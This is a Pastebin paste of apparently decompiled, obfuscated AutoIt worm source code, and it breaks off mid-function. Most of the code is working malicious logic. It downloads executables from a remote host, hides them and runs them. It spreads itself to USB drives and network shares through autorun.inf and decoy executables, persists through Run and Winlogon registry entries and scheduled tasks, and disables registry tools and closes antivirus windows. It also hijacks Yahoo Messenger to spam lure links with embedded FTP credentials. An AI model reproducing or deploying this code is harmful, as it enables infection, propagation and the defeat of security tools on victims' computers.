Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #NoTrayIcon
- Func a140030003034($arg00)
- Return RunWait(@ComSpec & " /C " & $arg00, "", @SW_HIDE)
- EndFunc
- Func a250040004048()
- If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
- InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
- EndIf
- Sleep(1000)
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
- If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
- InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
- EndIf
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
- If InetGet("http://www.yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
- InetGet("http://www.yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
- EndIf
- EndIf
- EndIf
- FileSetAttrib(@SystemDir & "\" & "setting" & ".ini", "+RSH")
- EndFunc
- Func a55005000501f()
- a250040004048()
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") <> "" Then
- If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
- If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0) = 0 Then
- InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0)
- EndIf
- Sleep(3000)
- If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
- If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size01", "")) Then
- FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", "+RSH")
- Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")
- EndIf
- EndIf
- EndIf
- EndIf
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") <> "" Then
- If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
- If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0) = 0 Then
- InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0)
- EndIf
- Sleep(3000)
- If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
- If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size02", "")) Then
- FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", "+RSH")
- Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")
- EndIf
- EndIf
- EndIf
- EndIf
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") <> "" Then
- If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
- If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0) = 0 Then
- InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0)
- EndIf
- Sleep(3000)
- If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
- If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size03", "")) Then
- FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", "+RSH")
- Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")
- EndIf
- EndIf
- EndIf
- EndIf
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
- If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
- If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0) = 0 Then
- InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0)
- EndIf
- Sleep(3000)
- If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
- If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size04", "")) Then
- FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", "+RSH")
- Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")
- EndIf
- EndIf
- EndIf
- EndIf
- If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
- If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
- If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0) = 0 Then
- InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0)
- EndIf
- Sleep(3000)
- If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
- If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size05", "")) Then
- FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", "+RSH")
- Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")
- EndIf
- EndIf
- EndIf
- EndIf
- $a2640c040c013 = @HOUR + 2
- If $a2640c040c013 > 12 Then
- $a2640c040c013 = $a2640c040c013 - 12
- EndIf
- EndFunc
- Func a390060006024()
- $a2681b081b014 = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "myweb", "")
- If $a2681b081b014 = "" Then
- $a2681b081b014 = "selfextract.exe"
- EndIf
- Dim $gdimarr0000[10]
- $gdimarr0000[0] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[0]", "")
- If $gdimarr0000[0] = "" Then
- $gdimarr0000[0] = "cyber cafe scandal visit ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[1] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[1]", "")
- If $gdimarr0000[1] = "" Then
- $gdimarr0000[1] = "World Business news broadcaster ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[2] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[2]", "")
- If $gdimarr0000[2] = "" Then
- $gdimarr0000[2] = "Regular monthly income by wearing your shorts at the comfort of your home for more info ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[3] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[3]", "")
- If $gdimarr0000[3] = "" Then
- $gdimarr0000[3] = "Nfs carbon download ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[4] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[4]", "")
- If $gdimarr0000[4] = "" Then
- $gdimarr0000[4] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[5] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[5]", "")
- If $gdimarr0000[5] = "" Then
- $gdimarr0000[5] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/ " & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[6] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[6]", "")
- If $gdimarr0000[6] = "" Then
- $gdimarr0000[6] = "stream Video of Nayanthara and Simbu ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[7] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[7]", "")
- If $gdimarr0000[7] = "" Then
- $gdimarr0000[7] = "Aishwarya Rai videos ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[8] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[8]", "")
- If $gdimarr0000[8] = "" Then
- $gdimarr0000[8] = "Free mobile games ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- $gdimarr0000[9] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[9]", "")
- If $gdimarr0000[9] = "" Then
- $gdimarr0000[9] = "Nse going to crash for more ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
- EndIf
- If WinExists(WinGetTitle("Yahoo! Messenger", "")) = 1 Then
- ClipPut($gdimarr0000[Random(0, 9, 1)])
- BlockInput(1)
- WinActivate(WinGetTitle("Yahoo! Messenger", ""))
- Send("!m")
- Send("un")
- Send("^v {ENTER}{ENTER}")
- Send("^m")
- Send("{DOWN}")
- Send("^{SHIFTDOWN}{END}{SHIFTUP}")
- Send("{ENTER}")
- Send("^v {ENTER}")
- BlockInput(0)
- EndIf
- $a1040f040f03c = @MIN + 30
- If $a1040f040f03c > 60 Then
- $a1040f040f03c = $a1040f040f03c - 60
- EndIf
- EndFunc
- Func a4e0070007039()
- If WinExists("Bkav2006") Then
- WinClose("Bkav2006")
- RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "BkavFw")
- EndIf
- If WinExists("System Configuration") Then
- WinClose("System Configuration")
- EndIf
- If WinExists("Registry") Then
- WinClose("Registry")
- EndIf
- If WinExists("Windows mask") Then
- WinClose("Windows mask")
- EndIf
- If WinExists("[FireLion]") Then
- RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "IEProtection")
- Shutdown(2)
- EndIf
- If ProcessExists("cmder.exe") Then
- ProcessClose("cmder.exe")
- EndIf
- EndFunc
- Func a1b0090009002($arg00)
- Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
- While 1
- Dim $gdimvar0002 = FileFindNextFile($var0000)
- If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
- If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
- FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
- FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
- a1b0090009002($arg00 & "\" & $gdimvar0002)
- EndIf
- Sleep(1)
- WEnd
- FileClose($var0000)
- EndFunc
- Func a630080008039()
- $a571230123018 = DriveGetDrive("REMOVABLE")
- If NOT @error Then
- Dim $gdimarr0001[6]
- $gdimarr0001[1] = ""
- For $a4f00f000f042 = 1 To $a571230123018[0]
- $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
- Next
- If $gdimarr0001[0] <> "A:" Then
- If $gdimarr0001[0] <> "" Then
- FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
- Sleep(1)
- FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
- Sleep(1)
- FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
- FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
- Sleep(1)
- a1b0090009002($gdimarr0001[0])
- EndIf
- EndIf
- If $gdimarr0001[0] = "A:" Then
- If $gdimarr0001[1] <> "" Then
- FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
- Sleep(1)
- FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
- Sleep(1)
- FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
- FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
- Sleep(1)
- a1b0090009002($gdimarr0001[1])
- EndIf
- EndIf
- EndIf
- EndFunc
- Func a2200a000a01f()
- Dim $gdimarr0003[30]
- For $a4f00f000f042 = 1 To 30
- $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
- If @error Then ExitLoop
- $a296220622038 = StringReplace($a296220622038, "/", "\")
- $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
- $a2b6270627002 = FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
- If $a2b6270627002 = 1 Then
- FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
- FileCopy(@SystemDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
- FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
- a1b0090009002($gdimarr0003[$a4f00f000f042])
- EndIf
- Next
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
- EndFunc
- Func a5b00b000b003()
- IniWrite(@SystemDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
- IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
- IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
- IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell", "Open")
- Sleep(1)
- FileSetAttrib(@SystemDir & "\setup.ini", "+RSH")
- EndFunc
- Func install()
- Opt("RunErrorsFatal", 0)
- DirCreate(@SystemDir & "\28463")
- FileSetAttrib(@SystemDir & "\28463", "SH")
- FileInstall("C:\svchost.exe", @SystemDir & "\28463\" & "svchost" & ".exe", 0)
- FileInstall("C:\svchost.001", @SystemDir & "\28463\" & "svchost" & ".001", 0)
- FileCopy(@AutoItExe, @SystemDir & "\" & "regsvr" & ".exe", 0)
- FileSetAttrib(@SystemDir & "\" & "regsvr" & ".exe", "+RSH")
- FileCopy(@AutoItExe, @WindowsDir & "\" & "regsvr" & ".exe", 0)
- FileSetAttrib(@WindowsDir & "\" & "regsvr" & ".exe", "-RSH")
- FileCopy(@AutoItExe, @SystemDir & "\" & "svchost " & ".exe", 0)
- FileSetAttrib(@SystemDir & "\" & "svchost " & ".exe", "+RSH")
- $12345 = "C:\WINDOWS\system32\regsvr.exe"
- If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
- Run(@SystemDir & "\28463\" & "svchost" & ".exe", "")
- EndIf
- EndFunc
- Func regedit()
- RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & "regsvr" & ".exe")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @SystemDir & "\" & "regsvr" & ".exe")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
- RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
- EndFunc
- Func funmain()
- $hour = @HOUR + 2
- $min = @MIN + 30
- Opt("RunErrorsFatal", 0)
- install()
- regedit()
- a140030003034("AT /delete /yes")
- a140030003034("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" & "svchost " & ".exe")
- a5b00b000b003()
- a55005000501f()
- a390060006024()
- If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
- a2200a000a01f()
- EndIf
- If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
- If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
- a2200a000a01f()
- EndIf
- EndIf
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- While (1)
- a4e0070007039()
- a630080008039()
- If @HOUR = $hour Then
- a55005000501f()
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- EndIf
- If @MIN = $min Then
- a390060006024()
- EndIf
- WEnd
- EndFunc
- Func delete()
- FileDelete(@SystemDir & "\setup.ini")
- FileMove(@SystemDir & "\" & "rundll" & ".exe", @SystemDir & "\" & "delete" & ".exe", 9)
- FileDelete(@SystemDir & "\setup.ini")
- If FileExists(@SystemDir & "\" & "regsvr" & ".exe") Then
- FileDelete(@SystemDir & "\" & "regsvr" & ".exe")
- EndIf
- If FileExists(@SystemDir & "\" & "winhelp" & ".exe") Then
- FileDelete(@SystemDir & "\" & "winhelp" & ".exe")
- EndIf
- If FileExists(@WindowsDir & "\" & "regsvr" & ".exe") Then
- FileDelete(@WindowsDir & "\" & "regsvr" & ".exe")
- EndIf
- If FileExists(@WindowsDir & "\" & "winhelp" & ".ini") Then
- FileDelete(@WindowsDir & "\" & "winhelp" & ".ini")
- EndIf
- RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
- RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe ")
- RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 0)
- RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
- EndFunc
- Func removablerestrict()
- $a571230123018 = DriveGetDrive("REMOVABLE")
- If NOT @error Then
- Dim $gdimarr0001[6]
- $gdimarr0001[1] = ""
- For $a4f00f000f042 = 1 To $a571230123018[0]
- $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
- Next
- If $gdimarr0001[0] <> "A:" Then
- If $gdimarr0001[0] <> "" Then
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
- Sleep(1)
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
- Sleep(1)
- FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
- FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
- Sleep(1)
- removablerestrictsupport($gdimarr0001[0])
- EndIf
- EndIf
- If $gdimarr0001[0] = "A:" Then
- If $gdimarr0001[1] <> "" Then
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
- Sleep(1)
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
- Sleep(1)
- FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
- FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
- Sleep(1)
- removablerestrictsupport($gdimarr0001[1])
- EndIf
- EndIf
- EndIf
- EndFunc
- Func removablerestrictsupport($arg00)
- Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
- While 1
- Dim $gdimvar0002 = FileFindNextFile($var0000)
- If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
- If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
- FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
- removablerestrictsupport($arg00 & "\" & $gdimvar0002)
- EndIf
- Sleep(1)
- WEnd
- FileClose($var0000)
- EndFunc
- Func networkrestrict()
- Dim $gdimarr0003[30]
- For $a4f00f000f042 = 1 To 30
- $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
- If @error Then ExitLoop
- $a296220622038 = StringReplace($a296220622038, "/", "\")
- $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
- $a2b6270627002 = FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
- If $a2b6270627002 = 1 Then
- FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
- FileCopy(@AppDataDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
- FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
- removablerestrictsupport($gdimarr0003[$a4f00f000f042])
- EndIf
- Next
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
- EndFunc
- Func writeini()
- IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
- IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
- IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
- IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell", "Open")
- Sleep(1)
- FileSetAttrib(@AppDataDir & "\setup.ini", "+RSH")
- EndFunc
- Func installrestrict()
- Opt("RunErrorsFatal", 0)
- DirCreate(@AppDataDir & "\support")
- FileInstall("C:\svchost.exe", @AppDataDir & "\support\" & "svchost" & ".exe", 0)
- FileInstall("C:\svchost.001", @AppDataDir & "\support\" & "svchost" & ".001", 0)
- FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".exe", "+RSH")
- FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".001", "+RSH")
- FileCopy(@AutoItExe, @AppDataDir & "\" & "regsvr" & ".exe", 0)
- $12345 = @AppDataDir & "\" & "regsvr" & ".exe"
- If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
- Run(@AppDataDir & "\support\" & "svchost" & ".exe", "")
- EndIf
- EndFunc
- Func regeditrestrict()
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @AppDataDir & "\regsvr" & ".exe")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messsenger", "REG_SZ", @AppDataDir & "\support\" & "svchost" & ".exe")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
- EndFunc
- Func restrictmain()
- $hour = @HOUR + 2
- $min = @MIN + 30
- Opt("RunErrorsFatal", 0)
- installrestrict()
- regeditrestrict()
- writeini()
- a390060006024()
- If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
- networkrestrict()
- EndIf
- If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
